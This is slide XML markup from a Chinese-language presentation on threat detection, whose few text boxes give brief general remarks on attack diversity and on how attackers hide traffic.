                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl7pPr>
              <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3735">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Group 25"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3372192" y="3620530"/>
              <a:ext cx="384000" cy="377905"/>
              <a:chOff x="1587575" y="2265358"/>
              <a:chExt cx="314468" cy="309477"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId21"/>
                </p:custDataLst>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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Oval 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId22"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1712364" y="2387652"/>
                <a:ext cx="64890" cy="62395"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr defTabSz="914400">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:latin typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5218641" y="1247937"/>
            <a:ext cx="937684" cy="937684"/>
            <a:chOff x="6647222" y="2335936"/>
            <a:chExt cx="937684" cy="937684"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 90"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6647222" y="2335936"/>
              <a:ext cx="937684" cy="9376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84530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="742950" indent="-285750" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl2pPr>
              <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl4pPr>
              <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="684530">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl5pPr>
              <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl6pPr>
              <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl7pPr>
              <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="684530" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" charset="0"/>
                </a:defRPr>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="3735">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="图形 41" descr="Internet 纯色填充"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24"/>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86729" y="2475443"/>
              <a:ext cx="658671" cy="658671"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="燕尾形 43"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId27"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16380000">
            <a:off x="3235325" y="3596640"/>
            <a:ext cx="536575" cy="471170"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">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燕尾形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId28"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19140000">
            <a:off x="4022725" y="2028825"/>
            <a:ext cx="536575" cy="471170"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">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燕尾形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId29"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1560000">
            <a:off x="7016115" y="1831975"/>
            <a:ext cx="536575" cy="471170"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">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3" name="燕尾形 52"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId30"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4380000">
            <a:off x="8004810" y="3288665"/>
            <a:ext cx="536575" cy="471170"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">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31"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375785" y="2571750"/>
            <a:ext cx="2910840" cy="2665730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId33"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8675947" y="2509752"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId34"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8891212" y="4552547"/>
            <a:ext cx="1402080" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>操作</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="24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bldLst>
      <p:bldP spid="45" grpId="1"/>
      <p:bldP spid="46" grpId="1"/>
      <p:bldP spid="44" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="44" grpId="1" animBg="1"/>
      <p:bldP spid="51" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="51" grpId="1" animBg="1"/>
      <p:bldP spid="52" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="52" grpId="1" animBg="1"/>
      <p:bldP spid="53" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="5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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>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等腰三角形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2132330" y="4768215"/>
            <a:ext cx="2535555" cy="2095500"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C79ED3"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="等腰三角形 12"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4890135" y="3751580"/>
            <a:ext cx="3765550" cy="3112135"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="636190"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="等腰三角形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7688580" y="4883150"/>
            <a:ext cx="2371725" cy="1980565"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CEB4D7"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="等腰三角形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4380865" y="5651500"/>
            <a:ext cx="1450975" cy="1212215"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BDA9DB"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772910" y="3188970"/>
            <a:ext cx="0" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="636190"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直接连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3404870" y="3408045"/>
            <a:ext cx="0" cy="1360170"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C79ED3"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接连接符 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106670" y="5257800"/>
            <a:ext cx="0" cy="340360"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="BDA9DB"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直接连接符 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8877935" y="4512945"/>
            <a:ext cx="0" cy="370205"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="CEB4D7"/>
            </a:solidFill>
            <a:prstDash val="lgDash"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="oval"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493645" y="1447800"/>
            <a:ext cx="1887220" cy="353060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>多样化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="300">
              <a:solidFill>
                <a:srgbClr val="636190"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2515235" y="1837690"/>
            <a:ext cx="1769745" cy="1570355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
                <a:solidFill>
                  <a:srgbClr val="9F92B0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:sym typeface="微软雅黑"/>
              </a:rPr>
              <a:t>攻击者采用多种手段，如恶意软件、社交工程、拒绝服务攻击等，使得威胁检测需要综合考虑多种威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
                <a:solidFill>
                  <a:srgbClr val="9F92B0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:sym typeface="微软雅黑"/>
              </a:rPr>
              <a:t>形式。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
              <a:solidFill>
                <a:srgbClr val="9F92B0"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:sym typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130040" y="3234055"/>
            <a:ext cx="1887220" cy="353060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>伪装性和隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="300">
              <a:solidFill>
                <a:srgbClr val="636190"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4130040" y="3634105"/>
            <a:ext cx="1769745" cy="1570355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
                <a:solidFill>
                  <a:srgbClr val="9F92B0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:sym typeface="微软雅黑"/>
              </a:rPr>
              <a:t>攻击者常常采用隐蔽手段来规避检测，如使用加密通信、伪装攻击流量，使得检测变得更加复杂。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
              <a:solidFill>
                <a:srgbClr val="9F92B0"/>
              </a:solidFill>
              <a:uFillTx/>
